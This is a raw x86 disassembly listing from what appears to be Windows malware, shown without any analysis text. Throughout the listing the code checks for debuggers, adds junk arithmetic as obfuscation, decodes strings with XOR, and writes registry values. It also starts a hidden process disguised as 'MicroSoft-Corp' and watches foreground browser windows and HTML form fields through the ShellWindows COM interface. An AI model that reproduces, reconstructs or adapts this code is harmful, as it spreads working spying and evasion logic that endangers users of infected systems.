call sub_40C634 ; IsDebuggerPresent
push 33h
push offset byte_44610D
call sub_405254
push 1
push 0
push offset byte_446605
push offset byte_446605
push eax
push 80000001h
call sub_4015EB
mov [ebp+var_109], 0A7h
movzx eax, [ebp+var_109]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_109], al
push 3Bh
push offset byte_4460D1
call sub_405254
push 1
push 0
push offset byte_446605
push offset byte_446605
push eax
push 80000001h
call sub_4015EB
add esp, 68h
pop edi
pop esi
leave
retn
sub_405F79 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4062CD proc near ; CODE XREF: sub_409847+2C6�p
; sub_409847+5E3�p ...
var_3B8 = dword ptr -3B8h
var_3B1 = byte ptr -3B1h
var_3B0 = dword ptr -3B0h
var_3AB = byte ptr -3ABh
var_2A7 = byte ptr -2A7h
var_2A2 = byte ptr -2A2h
var_29F = byte ptr -29Fh
var_29D = byte ptr -29Dh
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = byte ptr -294h
var_290 = byte ptr -290h
var_28D = byte ptr -28Dh
var_285 = byte ptr -285h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = word ptr -270h
var_26E = word ptr -26Eh
var_26C = word ptr -26Ch
var_269 = byte ptr -269h
var_268 = dword ptr -268h
var_264 = word ptr -264h
var_261 = byte ptr -261h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_250 = byte ptr -250h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_11C = dword ptr -11Ch
var_118 = word ptr -118h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 3B8h
push ebx
push esi
push edi
mov [ebp+var_261], 59h
add [ebp+var_261], 14h
and [ebp+var_14C], 0
mov [ebp+var_264], 798Fh
sub [ebp+var_264], 30E0h
xor ebx, ebx
lea edi, [ebp+var_285]
lea esi, aJv_ ; "&JV_"
mov ecx, 5
rep movsb
push offset dword_4412C0
call sub_40C610 ; InterlockedIncrement
mov [ebp+var_274], eax
lea edi, [ebp+var_28D]
lea esi, byte_441327
movsd
movsd
push 10h
push 0
lea eax, [ebp+var_260]
push eax
call sub_40CA00
lea edi, [ebp+var_290]
lea esi, byte_44132F
mov ecx, 3
rep movsb
mov [ebp+var_278], 104h
push 21h
push offset byte_4460AF
call sub_405254
mov [ebp+var_298], eax
push 4
push offset aMxd ; "|MXD"
call sub_405254
lea edi, [ebp+var_294]
push edi
lea edi, [ebp+var_278]
push edi
lea edi, [ebp+var_250]
push edi
push eax
mov edi, [ebp+var_298]
push edi
push 80000002h
call sub_4014BD
add esp, 34h
mov [ebp+var_27C], eax
mov [ebp+var_268], 1431h
sub [ebp+var_268], 2BF6h
or eax, eax
jnz short loc_4063F9
mov [ebp+var_29C], 2D07h
inc [ebp+var_29C]
push [ebp+arg_0]
call sub_40C658 ; LocalFree
lea edi, [ebp+var_2A2]
lea esi, word_441332
mov ecx, 3
rep movsw
xor eax, eax
jmp loc_40689D
; ---------------------------------------------------------------------------
loc_4063F9: ; CODE XREF: sub_4062CD+F7�j
call sub_405F79
mov [ebp+var_269], 2
add [ebp+var_269], 0BCh
push 104h
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_250]
push eax
call sub_40C4F0 ; ExpandEnvironmentStringsA
push [ebp+var_274]
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_250]
push eax
call sub_405601
add esp, 20h
mov [ebp+var_14C], eax
cmp [ebp+arg_1C], 0
jz short loc_40646F
cmp eax, 0FFFFFFFFh
jz short loc_406469
mov eax, [ebp+arg_1C]
mov edx, [ebp+var_14C]
mov [eax], edx
jmp short loc_40646F
; ---------------------------------------------------------------------------
loc_406469: ; CODE XREF: sub_4062CD+18D�j
mov eax, [ebp+arg_1C]
and dword ptr [eax], 0
loc_40646F: ; CODE XREF: sub_4062CD+188�j
; sub_4062CD+19A�j
cmp [ebp+var_14C], 0
jnz short loc_4064B7
lea edi, [ebp+var_29D]
lea esi, byte_441338
mov ecx, 3
rep movsb
push [ebp+arg_0]
call sub_40C658 ; LocalFree
mov word ptr [ebp+var_29C+2], 3601h
movzx eax, word ptr [ebp+var_29C+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_29C+2], ax
xor eax, eax
jmp loc_40689D
; ---------------------------------------------------------------------------
loc_4064B7: ; CODE XREF: sub_4062CD+1A9�j
push 0Eh
push offset byte_44609B
call sub_405254
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA54
lea eax, [ebp+var_250]
push eax
lea eax, [ebp+var_104]
push eax
call sub_40CA54
call sub_40C538 ; RtlGetLastWin32Error
call sub_404527
mov [ebp+var_280], eax
call sub_40C538 ; RtlGetLastWin32Error
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
mov [ebp+var_26C], 597Ch
movzx eax, [ebp+var_26C]
imul eax, 641Bh
mov [ebp+var_26C], ax
push 44h
push 0
lea eax, [ebp+var_148]
push eax
call sub_40CA00
add esp, 30h
call sub_40C508 ; GetCurrentProcessId
mov [ebp+var_148], 44h
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_11C], 1
mov [ebp+var_118], 1
cmp [ebp+var_280], 0
jz short loc_406577
lea eax, [ebp+var_148]
push eax
call sub_4045B7
pop ecx
jmp short loc_406580
; ---------------------------------------------------------------------------
loc_406577: ; CODE XREF: sub_4062CD+299�j
mov [ebp+var_118], 0
loc_406580: ; CODE XREF: sub_4062CD+2A8�j
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_148]
push eax
push 0
push 0
push 20h
push 0
push 0
push 0
lea eax, [ebp+var_104]
push eax
push 0
call sub_40C70C ; CreateProcessA
or eax, eax
jz loc_406823
call sub_40C634 ; IsDebuggerPresent
push [ebp+var_25C]
call sub_40C55C ; CloseHandle
push 22h
push offset dword_446078
call sub_405254
push [ebp+var_274]
push offset aMicrosoftCorp ; "MicroSoft-Corp"
push eax
lea edi, [ebp+var_104]
push edi
call sub_40CA30
add esp, 18h
call sub_40C538 ; RtlGetLastWin32Error
mov byte ptr [ebp+var_29C+3], 0
jmp short loc_406651
; ---------------------------------------------------------------------------
loc_4065F5: ; CODE XREF: sub_4062CD+38C�j
lea edi, [ebp+var_29F]
lea esi, aCayc_ ; "CYc_"
mov ecx, 3
rep movsw
push 7
push offset aEijMai ; "eij^MAI"
call sub_405254
add esp, 8
lea edi, [ebp+var_104]
push edi
push eax
call sub_40C784 ; FindWindowA
mov ebx, eax
call sub_40C538 ; RtlGetLastWin32Error
or ebx, ebx
jnz short loc_40665B
call sub_40C508 ; GetCurrentProcessId
mov eax, dword_4412B4
add eax, 3E0h
push eax
call sub_40C6D0 ; Sleep
call sub_40C5A4 ; GetVersion
add byte ptr [ebp+var_29C+3], 1
loc_406651: ; CODE XREF: sub_4062CD+326�j
mov al, byte ptr [ebp+var_29C+3]
cmp al, 0Ah
jb short loc_4065F5
loc_40665B: ; CODE XREF: sub_4062CD+361�j
or ebx, ebx
jz loc_40680C
mov word ptr [ebp+var_29C], 7B09h
sub word ptr [ebp+var_29C], 714Fh
push 0F000h
call sub_40C6D0 ; Sleep
mov [ebp+var_29D], 5Bh
add [ebp+var_29D], 5Ah
push 104h
lea eax, [ebp+var_104]
push eax
push ebx
call sub_40C76C ; GetWindowTextA
mov eax, 0Fh
sub eax, dword_4412B8
push eax
push offset aXOkrecv11 ; "X-okRecv11"
lea eax, [ebp+var_104]
push eax
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz loc_4067FE
call sub_40C514 ; GetCurrentThreadId
lea edi, [ebp+var_2A7]
lea esi, aIk ; "Ik"
mov ecx, 3
rep movsb
mov dword ptr [ebp-2A4h], 4145h
mov eax, 6B7Ch
mul dword ptr [ebp-2A4h]
mov [ebp+var_3B0], eax
mov [ebp-2A4h], eax
lea eax, [ebp+var_3AB]
push eax
push [ebp+arg_4]
call sub_4053A1
add esp, 8
or eax, eax
jz loc_4067ED
call sub_40C598 ; GetTickCount
push 0
push [ebp+arg_8]
lea eax, [ebp+var_3AB]
push eax
call sub_40C604 ; CopyFileA
lea eax, [ebp+var_14C]
push eax
push [ebp+arg_8]
call sub_401A36
mov [ebp+var_3B8], eax
call sub_40C634 ; IsDebuggerPresent
push [ebp+arg_8]
call sub_40C760 ; DeleteFileA
mov [ebp+var_3B1], 31h
movzx eax, [ebp+var_3B1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_3B1], al
push offset aHtml ; "<HTML><!--"
call sub_40C73C ; lstrlenA
push eax
push offset aHtml ; "<HTML><!--"
push [ebp+var_3B8]
call sub_40CA6C
add esp, 14h
or eax, eax
jnz short loc_4067BB
push offset aHtml ; "<HTML><!--"
call sub_40C73C ; lstrlenA
mov edi, [ebp+var_14C]
sub edi, 3Ah
push edi
mov edi, eax
add edi, [ebp+var_3B8]
push edi
push [ebp+arg_8]
call sub_4052EF
add esp, 0Ch
jmp short loc_4067D6
; ---------------------------------------------------------------------------
loc_4067BB: ; CODE XREF: sub_4062CD+4C2�j
mov eax, [ebp+var_14C]
sub eax, 40h
push eax
push [ebp+var_3B8]
push [ebp+arg_8]
call sub_4052EF
add esp, 0Ch
loc_4067D6: ; CODE XREF: sub_4062CD+4EC�j
push [ebp+var_3B8]
call sub_40C658 ; LocalFree
mov [ebp+var_14C], 2
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_4067ED: ; CODE XREF: sub_4062CD+44A�j
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_14C], 1
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_4067FE: ; CODE XREF: sub_4062CD+3F7�j
call sub_40C5A4 ; GetVersion
and [ebp+var_14C], 0
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_40680C: ; CODE XREF: sub_4062CD+390�j
mov byte ptr [ebp+var_29C+2], 95h
sub byte ptr [ebp+var_29C+2], 0Bh
and [ebp+var_14C], 0
jmp short loc_406844
; ---------------------------------------------------------------------------
loc_406823: ; CODE XREF: sub_4062CD+2DD�j
mov byte ptr [ebp+var_29C+3], 1Dh
movzx eax, byte ptr [ebp+var_29C+3]
mov edx, eax
add edx, eax
mov eax, edx
mov byte ptr [ebp+var_29C+3], al
and [ebp+var_14C], 0
loc_406844: ; CODE XREF: sub_4062CD+51E�j
; sub_4062CD+52F�j ...
lea eax, [ebp+var_250]
push eax
call sub_40C760 ; DeleteFileA
call sub_40C634 ; IsDebuggerPresent
push [ebp+arg_0]
call sub_40C658 ; LocalFree
mov [ebp+var_26E], 769Dh
inc [ebp+var_26E]
push 0
push [ebp+var_260]
call sub_40C6DC ; TerminateProcess
mov [ebp+var_270], 6036h
sub [ebp+var_270], 528Eh
push [ebp+var_260]
call sub_40C55C ; CloseHandle
mov eax, [ebp+var_14C]
loc_40689D: ; CODE XREF: sub_4062CD+127�j
; sub_4062CD+1E5�j
pop edi
pop esi
pop ebx
leave
retn
sub_4062CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4068A2 proc near ; CODE XREF: sub_406A9A+CB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 315h
push esi
push [ebp+arg_0]
mov eax, dword_44134C
lea eax, ds:41B8A0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
xor edi, edi
jmp short loc_4068E9
; ---------------------------------------------------------------------------
loc_4068CF: ; CODE XREF: sub_4068A2+49�j
mov eax, dword_44134C
add eax, edi
lea eax, ds:41B8A0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0CAh
mov [eax], dl
inc edi
loc_4068E9: ; CODE XREF: sub_4068A2+2B�j
cmp edi, esi
jl short loc_4068CF
mov eax, dword_44134C
add eax, esi
mov byte ptr ds:dword_41B8A0[eax], 0
mov edi, dword_44134C
inc dword_44134C
mov eax, dword_44134C
lea eax, [eax+esi+1]
mov dword_44134C, eax
cmp eax, 0DD3h
jle short loc_406924
and dword_44134C, 0
loc_406924: ; CODE XREF: sub_4068A2+79�j
lea eax, dword_41B8A0[edi]
pop edi
pop esi
leave
retn
sub_4068A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40692E proc near ; CODE XREF: sub_406E2B+1A4�p
; sub_406E2B+555�p ...
var_C = dword ptr -0Ch
var_5 = dword ptr -5
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov [ebp+var_1], 0A8h
add [ebp+var_1], 0B3h
push [ebp+arg_0]
call sub_40C748 ; lstrlenW
mov edi, eax
mov eax, dword_44135C
mov [ebp+var_5], eax
push 0
push 0
push 1FFFh
push ebx
push edi
push [ebp+arg_0]
push 0
push 0
call sub_40C718 ; WideCharToMultiByte
mov esi, 6089h
mov eax, 2984h
mul esi
mov [ebp+var_C], eax
mov esi, eax
mov byte ptr [ebx+edi], 0
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40692E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406987 proc near ; CODE XREF: sub_4069E2+AB�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
mov [ebp+var_2], 40BBh
inc [ebp+var_2]
cmp dword_441354, 0
jz short loc_4069AF
mov eax, dword_441354
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_4069AF: ; CODE XREF: sub_406987+1B�j
mov edi, 2480h
sub edi, 4C20h
mov eax, [esi+4]
push dword ptr [esi+4]
mov ebx, [eax]
call dword ptr [ebx+8]
call sub_40C514 ; GetCurrentThreadId
mov eax, [esi]
push dword ptr [esi]
mov ebx, [eax]
call dword ptr [ebx+8]
call sub_40BA54
call sub_40C508 ; GetCurrentProcessId
pop edi
pop esi
pop ebx
leave
retn
sub_406987 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069E2 proc near ; CODE XREF: sub_406E2B+57�p
var_11 = byte ptr -11h
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_1], 0C1h
sub [ebp+var_1], 0FBh
and dword ptr [edi], 0
and dword ptr [edi+4], 0
push 0
call sub_40BA48
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_11]
push eax
push offset a9ba05972F6a811 ; "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
call sub_40BA3C
mov esi, eax
call sub_40C574 ; GetProcessHeap
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A8C
call sub_40C5A4 ; GetVersion
push edi
push offset dword_446BF4
push 4
push 0
lea eax, [ebp+var_11]
push eax
call sub_40BA30
mov esi, eax
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A8C
call sub_40C5A4 ; GetVersion
mov eax, edi
add eax, 4
push eax
push offset dword_446BE4
mov eax, [edi]
push dword ptr [edi]
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov esi, eax
call sub_40C514 ; GetCurrentThreadId
xor ebx, ebx
cmp esi, ebx
setl bl
or ebx, ebx
jnz short loc_406A8C
call sub_40C514 ; GetCurrentThreadId
xor eax, eax
inc eax
jmp short loc_406A95
; ---------------------------------------------------------------------------
loc_406A8C: ; CODE XREF: sub_4069E2+4A�j
; sub_4069E2+6F�j ...
push edi
call sub_406987
pop ecx
xor eax, eax
loc_406A95: ; CODE XREF: sub_4069E2+A8�j
pop edi
pop esi
pop ebx
leave
retn
sub_4069E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A9A proc near ; CODE XREF: sub_406E2B+AC�p
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10047 = byte ptr -10047h
var_1003F = byte ptr -1003Fh
var_10039 = byte ptr -10039h
var_10032 = byte ptr -10032h
var_10031 = byte ptr -10031h
var_1002C = dword ptr -1002Ch
var_10028 = byte ptr -10028h
var_29 = byte ptr -29h
var_28 = word ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10054h
call sub_40C498
push ebx
push esi
push edi
call sub_40C574 ; GetProcessHeap
cmp dword_441358, 0FFFFh
jz short loc_406AC2
and dword_441350, 0
loc_406AC2: ; CODE XREF: sub_406A9A+1F�j
mov [ebp+var_5], 0EDh
movzx eax, [ebp+var_5]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5], al
mov eax, dword_441350
cmp [ebp+arg_4], eax
jz loc_406D83
lea edi, [ebp+var_10031]
lea esi, a40? ; ":40?"
mov ecx, 5
rep movsb
mov eax, [ebp+arg_4]
mov dword_441350, eax
cmp dword_441354, 0
jz short loc_406B36
call sub_40C574 ; GetProcessHeap
mov eax, dword_441354
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_1004C], 90Dh
mov eax, [ebp+var_1004C]
mov edx, eax
add edx, eax
mov [ebp+var_1004C], edx
and dword_441354, 0
loc_406B36: ; CODE XREF: sub_406A9A+69�j
push 0FFFFh
lea eax, [ebp+var_10028]
push eax
push [ebp+arg_4]
call sub_40C76C ; GetWindowTextA
mov [ebp+var_8], 77DCh
movzx eax, [ebp+var_8]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_8], ax
push 1Bh
push offset aZgiEEmGdPDpPJe ; "ꃤꏲ"
call sub_4068A2
mov edi, 0Dh
sub edi, dword_441348
push edi
push eax
lea edi, [ebp+var_10028]
push edi
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jnz short loc_406BD3
mov word ptr [ebp+var_1004C], 18AFh
movzx eax, word ptr [ebp+var_1004C]
imul eax, 1C81h
mov word ptr [ebp+var_1004C], ax
and dword_441354, 0
mov word ptr [ebp+var_1004C+2], 985h
movzx eax, word ptr [ebp+var_1004C+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_1004C+2], ax
jmp loc_406D83
; ---------------------------------------------------------------------------
loc_406BD3: ; CODE XREF: sub_406A9A+F1�j
lea eax, [ebp+var_C]
push eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov [ebp+var_D], 1Eh
add [ebp+var_D], 1
cmp [ebp+var_C], 0
jz loc_406D83
mov [ebp+var_14], 6CC8h
mov eax, 4A3Dh
mul [ebp+var_14]
mov [ebp+var_1004C], eax
mov [ebp+var_14], eax
or ebx, ebx
jnz loc_406D83
and [ebp+var_4], 0
cmp dword_441358, 0FFFFh
jz short loc_406C6D
call sub_40C538 ; RtlGetLastWin32Error
inc dword_441358
mov eax, [ebp+var_C]
cmp dword_441358, eax
jbe short loc_406C44
and dword_441358, 0
loc_406C44: ; CODE XREF: sub_406A9A+1A1�j
mov [ebp+var_10050], 5B8Fh
mov eax, 1268h
mul [ebp+var_10050]
mov [ebp+var_10054], eax
mov [ebp+var_10050], eax
mov eax, dword_441358
mov [ebp+var_4], eax
loc_406C6D: ; CODE XREF: sub_406A9A+18B�j
; sub_406A9A+2DC�j
push 0
call sub_40C9B8
pop ecx
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_28], 2
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov dword_441358, eax
lea eax, [ebp+var_18]
push eax
lea esi, [ebp+var_28]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
mov edi, [edi+4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz loc_406D4B
lea edi, [ebp+var_10032]
lea esi, byte_441365
xor ecx, ecx
inc ecx
rep movsb
push offset dword_441354
push offset dword_446C04
mov eax, [ebp+var_18]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
or ebx, ebx
jnz short loc_406D4B
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_1002C]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+94h]
mov ebx, eax
lea edi, [ebp+var_10039]
lea esi, aNDlyo ; "N DLYO"
mov ecx, 7
rep movsb
or ebx, ebx
jnz short loc_406D4B
mov [ebp+var_29], 28h
sub [ebp+var_29], 8Ch
mov dword_441358, 0FFFFh
mov eax, [ebp+arg_4]
cmp [ebp+var_1002C], eax
jz short loc_406D83
lea edi, [ebp+var_1003F]
lea esi, aT2vxo ; "T2vxO"
mov ecx, 3
rep movsw
loc_406D4B: ; CODE XREF: sub_406A9A+214�j
; sub_406A9A+24B�j ...
cmp dword_441354, 0
jz short loc_406D5F
mov eax, dword_441354
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_406D5F: ; CODE XREF: sub_406A9A+2B8�j
lea edi, [ebp+var_10047]
lea esi, aWWavg ; "W'WAV`"
movsd
movsd
inc [ebp+var_4]
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb loc_406C6D
and dword_441354, 0
loc_406D83: ; CODE XREF: sub_406A9A+41�j
; sub_406A9A+134�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_406A9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406D88 proc near ; CODE XREF: sub_406E2B+5E6�p
; sub_406E2B+62A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_441384
lea eax, ds:430CF0h[eax]
push eax
call sub_40C9F4
add esp, 0Ch
mov [ebp+var_4], 27Ah
xor edi, edi
jmp short loc_406DD0
; ---------------------------------------------------------------------------
loc_406DB6: ; CODE XREF: sub_406D88+4A�j
mov eax, dword_441384
add eax, edi
lea eax, ds:430CF0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0EDh
mov [eax], dl
inc edi
loc_406DD0: ; CODE XREF: sub_406D88+2C�j
cmp edi, esi
jl short loc_406DB6
mov [ebp+var_8], 200h
mov eax, dword_441384
add eax, esi
mov byte ptr ds:dword_430CF0[eax], 0
xor edi, edi
mov edi, dword_441384
inc dword_441384
mov eax, dword_441384
add eax, 6
add eax, esi
mov dword_441384, eax
add dword_441384, 3
cmp dword_441384, 0E0Fh
jle short loc_406E21
and dword_441384, 0
loc_406E21: ; CODE XREF: sub_406D88+90�j
lea eax, dword_430CF0[edi]
pop edi
pop esi
leave
retn
sub_406D88 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406E2B proc near ; CODE XREF: sub_407F67+56�p
var_63822 = byte ptr -63822h
var_6381C = dword ptr -6381Ch
var_63816 = byte ptr -63816h
var_62818 = dword ptr -62818h
var_62813 = byte ptr -62813h
var_6280E = byte ptr -6280Eh
var_6280D = byte ptr -6280Dh
var_6280C = dword ptr -6280Ch
var_62808 = word ptr -62808h
var_62800 = dword ptr -62800h
var_627F8 = word ptr -627F8h
var_627F0 = dword ptr -627F0h
var_627E8 = dword ptr -627E8h
var_627E4 = dword ptr -627E4h
var_627E0 = word ptr -627E0h
var_627DD = byte ptr -627DDh
var_627DA = byte ptr -627DAh
var_627D3 = byte ptr -627D3h
var_627CC = word ptr -627CCh
var_627CA = word ptr -627CAh
var_627C8 = dword ptr -627C8h
var_627C4 = byte ptr -627C4h
var_627C3 = byte ptr -627C3h
var_627C2 = word ptr -627C2h
var_627C0 = byte ptr -627C0h
var_627BF = byte ptr -627BFh
var_626C0 = dword ptr -626C0h
var_626BC = dword ptr -626BCh
var_626B8 = word ptr -626B8h
var_626B0 = dword ptr -626B0h
var_626A4 = dword ptr -626A4h
var_626A0 = dword ptr -626A0h
var_6269C = dword ptr -6269Ch
var_62698 = dword ptr -62698h
var_62694 = dword ptr -62694h
var_62690 = dword ptr -62690h
var_6268C = dword ptr -6268Ch
var_62687 = byte ptr -62687h
var_62682 = word ptr -62682h
var_6267F = byte ptr -6267Fh
var_526B8 = byte ptr -526B8h
var_526B0 = dword ptr -526B0h
var_526AA = byte ptr -526AAh
var_526A9 = byte ptr -526A9h
var_526A8 = byte ptr -526A8h
var_526A0 = dword ptr -526A0h
var_52696 = byte ptr -52696h
var_52690 = word ptr -52690h
var_52688 = dword ptr -52688h
var_52684 = dword ptr -52684h
var_52680 = dword ptr -52680h
var_5267A = byte ptr -5267Ah
var_52674 = byte ptr -52674h
var_5266F = byte ptr -5266Fh
var_52669 = byte ptr -52669h
var_52668 = byte ptr -52668h
var_52667 = byte ptr -52667h
var_52666 = byte ptr -52666h
var_52663 = word ptr -52663h
var_52661 = byte ptr -52661h
var_5265A = word ptr -5265Ah
var_52658 = dword ptr -52658h
var_52652 = word ptr -52652h
var_5264F = byte ptr -5264Fh
var_52649 = byte ptr -52649h
var_52644 = dword ptr -52644h
var_52640 = dword ptr -52640h
var_5263C = dword ptr -5263Ch
var_52638 = byte ptr -52638h
var_52630 = dword ptr -52630h
var_5262B = byte ptr -5262Bh
var_5262A = word ptr -5262Ah
var_52628 = dword ptr -52628h
var_52622 = word ptr -52622h
var_52620 = dword ptr -52620h
var_5261C = dword ptr -5261Ch
var_52618 = word ptr -52618h
var_52616 = word ptr -52616h
var_52614 = dword ptr -52614h
var_5260F = byte ptr -5260Fh
var_5260E = word ptr -5260Eh
var_5260C = dword ptr -5260Ch
var_52606 = word ptr -52606h
var_52604 = dword ptr -52604h
var_525FE = word ptr -525FEh
var_525FC = dword ptr -525FCh
var_525F8 = dword ptr -525F8h
var_525F4 = dword ptr -525F4h
var_525EE = word ptr -525EEh
var_525EC = dword ptr -525ECh
var_525E8 = dword ptr -525E8h
var_525E4 = dword ptr -525E4h
var_525DF = byte ptr -525DFh
var_524E0 = byte ptr -524E0h
var_524D8 = dword ptr -524D8h
var_524CC = dword ptr -524CCh
var_524C8 = byte ptr -524C8h
var_39E28 = byte ptr -39E28h
var_21788 = word ptr -21788h
var_21786 = word ptr -21786h
var_21784 = dword ptr -21784h
var_2177D = byte ptr -2177Dh
var_1177E = word ptr -1177Eh
var_1177C = word ptr -1177Ch
var_10FAC = dword ptr -10FACh
var_10FA8 = dword ptr -10FA8h
var_10FA4 = dword ptr -10FA4h
var_10001 = byte ptr -10001h
var_2 = word ptr -2
push ebp
mov ebp, esp
mov eax, 63824h
call sub_40C498
push ebx
push esi
push edi
call sub_40C5A4 ; GetVersion
push offset aValue ; "value"
call sub_40BA0C
mov [ebp+var_10FA8], eax
mov eax, dword_441394
mov [ebp+var_52644], eax
push offset aName ; "name"
call sub_40BA0C
mov [ebp+var_10FAC], eax
mov [ebp+var_52616], 569Bh
inc [ebp+var_52616]
lea eax, [ebp+var_52638]
push eax
call sub_4069E2
pop ecx
or eax, eax
jz loc_407F62
call sub_40C574 ; GetProcessHeap
loc_406E95: ; CODE XREF: sub_406E2B+CF�j
; sub_406E2B+F4�j ...
push 0
call sub_40C9B8
mov [ebp+var_52618], 0C8Fh
inc [ebp+var_52618]
call sub_40C7B4 ; GetForegroundWindow
mov [ebp+var_5261C], eax
lea edi, [ebp+var_52649]
lea esi, aOap ; "op*"
mov ecx, 5
rep movsb
push [ebp+var_5261C]
lea eax, [ebp+var_52638]
push eax
call sub_406A9A
add esp, 0Ch
lea edi, [ebp+var_5264F]
lea esi, aAcbls ; "AcBLs"
mov ecx, 3
rep movsw
cmp dword_441354, 0
jz short loc_406E95
mov ax, word_4413A3
mov [ebp+var_52652+1], ax
lea eax, [ebp+var_525F4]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+48h]
mov ebx, eax
or ebx, ebx
jnz loc_406E95
mov [ebp+var_52620], 6F23h
mov eax, 38F1h
mul [ebp+var_52620]
mov [ebp+var_52680], eax
mov [ebp+var_52620], eax
lea eax, [ebp+var_525F8]
push eax
push offset dword_446BA4
mov eax, [ebp+var_525F4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_525FC], 2AEFh
mov eax, [ebp+var_525FC]
mov edx, eax
add edx, eax
mov [ebp+var_525FC], edx
or ebx, ebx
jnz loc_407F44
lea eax, [ebp+var_5263C]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+78h]
mov ebx, eax
call sub_40C634 ; IsDebuggerPresent
or ebx, ebx
jnz loc_407F0E
mov [ebp+var_52622], 0A61h
movzx eax, [ebp+var_52622]
imul eax, 47C9h
mov [ebp+var_52622], ax
push offset byte_41EB90
push [ebp+var_5263C]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_52658], edi
call sub_40C598 ; GetTickCount
mov eax, [ebp+var_5261C]
mov ds:dword_42EB94, eax
